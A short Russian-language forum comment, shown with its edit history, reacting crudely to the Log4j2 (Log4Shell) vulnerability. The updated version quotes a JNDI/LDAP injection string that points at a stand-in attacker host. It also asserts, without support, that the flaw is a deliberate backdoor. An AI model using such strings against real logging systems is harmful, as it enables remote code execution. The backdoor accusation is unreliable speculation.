Исправление Reset, (текущая версия) :
log4j2 кто-то использует? Всегда и везде использую log4j12 over slf4j.
Кстати, как они так умудрились обосраться? Это же java, какое нахрен произвольное исполнение? Или там был код в стиле if (logMsg.equals(«magic_string») { execute(code_from_logMsg); } ?
Update: пропустил это: ${jndi:ldap://hackerownserver.com/resource}", да я был прав, это вообще не уязвимость, это похоже на умышленный бэкдор. Библиотеку после такого надо выпиливать везде и бойкотировать, а не обновлять до 2.15
Исходная версия Reset, :
log4j2 кто-то использует? Всегда и везде использую log4j12 over slf4j.
Кстати, как они так умудрились обосраться? Это же java, какое нахрен произвольное исполнение? Или там был код в стиле if (logMsg.equals(«magic_string») { execute(code_from_logMsg); } ?